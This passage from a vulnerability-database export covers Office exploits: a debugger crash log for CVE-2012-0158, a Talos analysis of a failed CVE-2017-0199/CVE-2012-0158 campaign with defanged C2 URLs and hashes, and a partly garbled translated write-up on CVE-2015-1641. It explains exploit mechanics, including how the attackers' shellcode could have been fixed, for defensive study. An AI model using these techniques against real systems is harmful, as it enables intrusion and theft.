Office\\Office12\\MSOHEV.DLL\n ModLoad: 40390000 40446000 C:\\Program Files\\Microsoft Office\\Office12\\msproof6.dll\n ModLoad: 7c420000 7c4a7000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\\MSVCP80.dll\n ModLoad: 7e720000 7e7d0000 C:\\WINDOWS\\system32\\SXS.DLL\n (a7c.b3c): Break instruction exception - code 80000003 (first chance)\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\ntdll.dll -\n eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005\n eip=7c90120e esp=03f3ffcc ebp=03f3fff4 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246\n ntdll!DbgBreakPoint:\n 7c90120e cc int 3\n 0:007> g\n ModLoad: 77b40000 77b62000 C:\\WINDOWS\\system32\\appHelp.dll\n ModLoad: 77a20000 77a74000 C:\\WINDOWS\\System32\\cscui.dll\n ModLoad: 76600000 7661d000 C:\\WINDOWS\\System32\\CSCDLL.dll\n ModLoad: 75f80000 7607d000 C:\\WINDOWS\\system32\\browseui.dll\n ModLoad: 76990000 769b5000 C:\\WINDOWS\\system32\\ntshrui.dll\n ModLoad: 76b20000 76b31000 C:\\WINDOWS\\system32\\ATL.DLL\n ModLoad: 769c0000 76a74000 C:\\WINDOWS\\system32\\USERENV.dll\n ModLoad: 7e290000 7e401000 C:\\WINDOWS\\system32\\SHDOCVW.dll\n ModLoad: 77a80000 77b15000 C:\\WINDOWS\\system32\\CRYPT32.dll\n ModLoad: 77b20000 77b32000 C:\\WINDOWS\\system32\\MSASN1.dll\n ModLoad: 754d0000 75550000 C:\\WINDOWS\\system32\\CRYPTUI.dll\n ModLoad: 771b0000 7725a000 C:\\WINDOWS\\system32\\WININET.dll\n ModLoad: 76c30000 76c5e000 C:\\WINDOWS\\system32\\WINTRUST.dll\n ModLoad: 76c90000 76cb8000 C:\\WINDOWS\\system32\\IMAGEHLP.dll\n ModLoad: 76f60000 76f8c000 C:\\WINDOWS\\system32\\WLDAP32.dll\n ModLoad: 76980000 76988000 C:\\WINDOWS\\system32\\LINKINFO.dll\n ModLoad: 27580000 27685000 C:\\WINDOWS\\system32\\MSCOMCTL.OCX\n ModLoad: 763b0000 763f9000 C:\\WINDOWS\\system32\\comdlg32.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 42640000 426c7000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\PSCRIPT5.DLL\n ModLoad: 73b30000 73b45000 C:\\WINDOWS\\system32\\mscms.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n (a7c.df4): Unknown exception - code e0000002 (first chance)\n ModLoad: 65000000 65278000 C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA6\\VBE6.DLL\n ModLoad: 65300000 65326000 C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA6\\1033\\VBE6INTL.DLL\n (a7c.df4): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\MSCOMCTL.OCX -\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Microsoft Office\\Office12\\wwlib.dll -\n eax=001d2d9c ebx=00000000 ecx=000000c4 edx=0237000d esi=0015e484 edi=00000118\n eip=2758fce3 esp=00121d10 ebp=00121d64 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:000000cc=????????\n 0:000> dd ecx\n 000000c4 ???????? ???????? ???????? ????????\n 000000d4 ???????? ???????? ???????? ????????\n 000000e4 ???????? ???????? ???????? ????????\n 000000f4 ???????? ???????? ???????? ????????\n 00000104 ???????? ???????? ???????? ????????\n 00000114 ???????? ???????? ???????? ????????\n 00000124 ???????? ???????? ???????? ????????\n 00000134 ???????? ???????? ???????? ????????\n \n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2012-08-15T00:00:00", "type": "attackerkb", "title": "Microsoft Windows TabStrip MSCOMCTL.OCX RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-1856"], "modified": "2021-07-27T00:00:00", "id": "AKB:4DF5EF01-8CC5-4A65-87F7-E627FAA3F022", "href": "https://attackerkb.com/topics/sFW6MySRX1/microsoft-windows-tabstrip-mscomctl-ocx-rce-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-08-14T18:08:43", "description": "<h3 id=\"h.o562lfhybzl7\">Introduction</h3><br />Since public disclosure in April 2017, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199\">CVE-2017-0199</a> has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.<br /><br />In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158\">CVE-2012-0158</a>, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run in order to test a new concept. In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.<br /><br />Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor.<br /><br /> Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails.<br /> <br /> Although this attack was unsuccessful it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn\u2019t quite work out, or it may be indication of future attacks yet to materialise.<br /> <a name='more'></a><br /><br /><h3 id=\"h.8er5iyy5kysj\">Standard CVE-2017-0199 exploitation</h3><div><br /></div>A typical attack exploiting CVE-2017-0199 consists of an email campaign, distributing a malicious RTF document.The vulnerability exists in code that handles Ole2Link embedded objects. Including an Ole2Link in an RTF document allows Word to load other, remote documents within the context of Word.<br /><br /><a href=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s1600/image3.png\" imageanchor=\"1\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s640/image3.png\" width=\"640\" /></a> <br /><div style=\"text-align: center;\">Standard CVE-2017-0199 flow</div><br />If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user:<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s1600/image13.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"309\" data-original-width=\"1438\" height=\"138\" src=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s640/image13.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word prompt displayed to the user before potential CVE-2017-0199 exploit attempt</div><div style=\"text-align: center;\"><br /></div><h3 id=\"h.roxzrd10uaho\">Modified CVE-2017-0199 flow</h3><br />In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. Referring to the attachment as a purchase order coming from an unknown \"partner\" is a very common social engineering trick of spammed malware. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s1600/image6.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"461\" data-original-width=\"1049\" height=\"280\" src=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s640/image6.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Email message launching the modified attack</div><div style=\"text-align: center;\"><br /></div>The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the mime content type of the remote document observed in the packet capture of the attack was not the expected application/hta but rather application/msword which was enough to motivate us to dig a little bit deeper in order to find out what the attackers are trying to achieve. <br /><br />The first surprising thing is that the vulnerable version of Word I used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document and then hung before eventually crashing with a memory access fault. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s1600/image4.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"500\" data-original-width=\"1600\" height=\"200\" src=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s640/image4.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word crashes without the prompt</div><br />The crash was caused not by the first exploit stage using CVE-2017-0199 but rather by the second stage using CVE-2012-0158. Here we see the shellcode embedded into a MSComctlLib.ListViewCtrl.2 ActiveX control, which is a telltale sign of CVE-2012-0158. The shellcode starts with a ROP chain followed by the shellcode which starts executing when the vulnerability is triggered. After the ROP chain sets the right permissions for the memory block containing the rest of the shellcode, the first stage of the shellcode is executed. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s1600/image5.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"330\" data-original-width=\"1600\" height=\"132\" src=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s640/image5.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode for CVE-2012-0158</div><br />This stage is responsible for the application crash. The attackers did not seem to have a good quality assurance process or perhaps the technical expertise to understand what will happen if they simply included an automatically generated CVE-2012-0158 exploit in combination with CVE-2017-0199. <br /><br />The shellcode starts with resolving several API addresses, which allow the code to traverse all open files by bruteforcing the handle numbers for open files, starting from zero and increasing the handle number by four for every next open file handle. If the handle exists, the shellcode attempts to check the file size using the GetFileSize API that takes the file handle as the parameter. If the file size is within the expected range the shellcode maps it in memory to perform a file type check. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s1600/image10.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"875\" data-original-width=\"1537\" height=\"364\" src=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s640/image10.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Checking the file size and finding file type</div><div style=\"text-align: center;\"><br /></div>The shellcode here incorrectly assumes that if the found file is an RTF file then all the required conditions are met and the identified RTF file must contain the next shellcode stage. Once the shellcode assumes the file size and type requirements are satisfied, it starts to read the mapped file looking for the next stage shellcode marker which is, in our test, never found because the original CVE-2017-0199 exploiting file is still present in memory. This file satisfies both of the conditions searched for by the first stage shellcode. Since the CVE-2017-0199 exploiting file is open before the CVE-2012-0158 document, its handle is smaller and it is read first by the shellcode. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"681\" data-original-width=\"1567\" height=\"278\" src=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s640/image1.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode looking for the next shellcode stage marker</div><div style=\"text-align: center;\"><br /></div>The shellcode searches for the next stage marker 0xfefefefefeffffffff within the wrong document, without correctly handling reads beyond the document length. This eventually causes a memory protection error by reading memory content past the allocated memory blocks. <br /><br />If the attackers would have been just a little bit more technically savvy they would realize this problem and easily fix it to make these two exploits work together successfully without the prompt to load the remote content being displayed to the end-user. <br /><br />One possible fix involves fixing a single byte to make the file size limits a bit stricter to exclude the original CVE-2017-0199 file size. The other way, just slightly more complex, is to correctly handle cases when the next stage marker is not found within the RTF and assume that the targeted Word process already has other RTF documents opened which satisfy the file size condition.<br /><br />Interestingly enough, the shellcode in the document containing the CVE-2012-0158 exploit will be successfully executed if there are no other open RTF files so we analyzed the remainder for the sake of completeness. <br /><br /><h3 id=\"h.1g5ixz26t8g5\">Second stage shellcode</h3><br />The second stage shellcode is a bit more complex and starts by finding required API functions within ntdll.dll. The API functions are used to launch an instance of svchost.exe in a suspended state, and to overwrite the original entrypoint with the final \"download and execute\" shellcode stage which eventually launches the executable payload.<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s1600/image9.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"933\" data-original-width=\"1600\" height=\"372\" src=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s640/image9.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Finding ntdll.dll APIs to inject the last stage and resume svchost.exe process</div><div style=\"text-align: center;\"><br /></div>The last shellcode stage, injected into svchost.exe uses UrlDownloadToFile API to download an executable file from the command and control server into the temporary files folder with the filename name.exe, and calls the ShellExecute function to launch the final payload. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"575\" data-original-width=\"1350\" height=\"272\" src=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s640/image2.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Download and execute stage</div><br />The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but it also runs Lokibot, based on the observed traffic to the command and control server. Ramnit is a well known self-replicating information stealing bot which also includes a rootkit to hide its presence from the user and security products and is already well documented. Further analysis of this particular piece of malware is outside of the scope of this blog post. Despite being older, the Ramnit family is still a commonly encountered malware family by Talos. It is possible that in this case the attackers intended to launch a Lokibot attack but the sample got infected by the Ramnit file infection component along the way. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s1600/image7.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"392\" data-original-width=\"1054\" height=\"238\" src=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s640/image7.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">DNS activity for multplelabs.com</div><br />The domain hosting the malware and the command and control server was registered in October 2016 and it is likely a compromised site, although it seems to have been used by some other Lokibot campaigns. The DNS activity for the domain shows two distinct spikes, which likely indicate two unsuccessful spam campaigns as there has been no additional activity to show increase in communication from infected systems to the command and control server. <br /><br />The DNS activity confirms our findings which document the reasons for the attack failure.<br /><h3 id=\"h.via3e3ir4d9t\">Conclusion</h3><br />CVE-2017-0199 is one of the most commonly used vulnerabilities exploited by malicious documents distributed in spamming campaigns. <a href=\"https://www.virusbulletin.com/blog/2017/06/cve-2017-0199-new-cve-2012-0158/\">Previous work</a> indicates that its popularity with attackers overcame the popularity of CVE-2012-0158. <br /><br />In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s1600/image11.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s640/image11.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Attempted combined attack stages</div><br />One has to wonder why did the attackers use the combination of a newer and an older exploit at all? The combination would not be executed if the targeted system had a patch against either of the exploits. In addition, if the targeted system was vulnerable to CVE-2012-0158 it would be much easier for the attackers to use a single exploit targeting this vulnerability.<br /><br />An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file. <br /><br />This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. This attack may have been an experiment that didn't quite work out, or it may be indication of future attacks yet to materialise.<br /><br /><h3 id=\"h.8lbs60io8ukk\">Coverage</h3><br /><a href=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s1600/image8.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"336\" data-original-width=\"400\" height=\"268\" src=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s320/image8.png\" width=\"320\" /></a>Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Email Security can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.<br /><br />AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.<br /><br />Umbrella prevents DNS resolution of the domains associated with malicious activity.<br /><br />Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.<br /><h3 id=\"h.3lh94s3hk6jp\">IOCs</h3><br />Documents<br /><br />5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199<br />6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158<br /><br />Executables<br /><br />351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474<br />f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6<br />43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe<br />d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13<br /><br />URLs<br /><br />hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158<br />hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper<br />hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2<br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=tm25zXE3Ntc:BBFLRcVK7jQ:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/tm25zXE3Ntc\" height=\"1\" width=\"1\" alt=\"\"/>", "cvss3": {}, "published": "2017-08-14T09:55:00", "title": "When combining exploits for added effect goes wrong", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199"], "modified": "2017-08-14T16:55:34", "id": "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/tm25zXE3Ntc/when-combining-exploits-for-added.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2016-12-03T17:44:02", "edition": 2, "description": "This is a period of vulnerability to share with you is CVE-2015-1641 learning summary, this vulnerability due to its good versatility and stability claims to have replaced the CVE-2012-0158 trend. The vulnerability is a type confusion class of vulnerability, through which you can achieve arbitrary address of the memory write data, and then according to vulnerability characteristics, combined with some of the typical use of the technique can achieve arbitrary code execution. \nThe vulnerability principle\nThis vulnerability of the common sample is the rtf Document Format File, this point and below, the exploit about, the main reason is the rtf to facilitate construction using components, of course this is not absolute\u3002 However, the vulnerability principle in fact, and rtf Document Format independent, but with the office open xml document format is implementation dependent. This document format of the common word document, expand the name is docx is actually a use the open xml organizations document internal resources after the zip compression package. In fact, the vulnerability of the rtf sample, generally contains 3 docx format file component, wherein the 2 files used to trigger the vulnerability component, the other as an exp component, still is not an absolute one. \n! [](/Article/UploadPic/2016-12/2016123171529970. png? www. myhack58. com! web) \nThe above 3 zip bag is from the rtf file sample in the extracted, as to how to extract here a simple way, the word document there is an Insert object function, you can insert another word document files, this sample is inserted into the 3 docx documents into it and then the main document is saved as rtf Document Format, then this 3 Insert the docx file object in the main file is a section of a 16-ary data, the corresponding 3 files in the 16-ary coding, so you can by a regular expression using Notepad++like editor from the main file in the extracted 16-ary coding:\u201c\\\\\\objdata [0-9a-f\\r\\n]+\u201d, and then by means of some hex editor such as 010edit Save As 3 docx/zip files. After that you can begin to analyze the vulnerability principle, the first second of the target file remove the zip suffix using the office Open, then the word program will directly crash, and in the debugger you can see the crash point is an assignment statement and ecx for a stable memory address value, \u5176\u6307\u5411\u7684\u8303\u56f4\u662f\u6f0f\u6d1e\u5229\u7528\u4f7f\u7528\u5230\u7684\u4e00\u4e2a\u4e3a\u4e86\u7ed5\u8fc7aslr\u7684\u6a21\u5757msvcr71.dll to: \n! [](/Article/UploadPic/2016-12/2016123171529671. png? www. myhack58. com! web) \nThen from the file point of view, plus the zip suffix decompression is as follows: \n! [](/Article/UploadPic/2016-12/2016123171529361. png? www. myhack58. com! web) \nWherein, the word directory is under the document. the xml for the organization of the documentation resource of primary documents, generally the document's text content is also on the inside, and from this file we can find to trigger this vulnerability the main content: \n! [](/Article/UploadPic/2016-12/2016123171530503. png? www. myhack58. com! web) \nAs can be seen in the debugger that appears in the crash point of the ecx value is directly unicode encoding in the smartTag tag element attribute value inside, and the condition is satisfied in the case msvcr71 module has been previously loaded, The follow-up will be a memory copy, and the copy of the destination address according to ecx calculated a value, and copy the data to 0xffffe696 that sub-label moveFromRange*the ID value 4294960790: the \n! [](/Article/UploadPic/2016-12/2016123171530111. png? www. myhack58. com! web) \nThus, by the file as the configuration of the content, the main control two variable values can be simple to achieve arbitrary memory address of the write data function. Of course, we are also more concerned about a focus on this construct the content of the principles is what? You can see this piece of content is a set of open xml closing tags, the outermost layer is the smartTag label, the innermost layer is moveFromRange*label. Respectively, refer to the msdn documentation of the relevant information, to be aware of these tags in detail, where attention to moveFromRange*label displaceByCustomXml Property description: \n! [](/Article/UploadPic/2016-12/2016123171530291. png? www. myhack58. com! web) \nFrom the above figure it can be seen, the attribute specified is replaced by a custom xml tag elements, in other words understand that is moveFromRange*the label of this attribute specifies the parent tag of a customXml object to be replaced. However, from the sample content we did not see the customXml tags, carefully observed a moment customXml tag, and smartTag label instructions after the discovery, the two Label elements not only function with a certain similarity, the internal property of the structure is also more interesting to keep consistent: \n! [](/Article/UploadPic/2016-12/2016123171530419. png? www. myhack58. com! web) \nCan imagine this on the same template out of 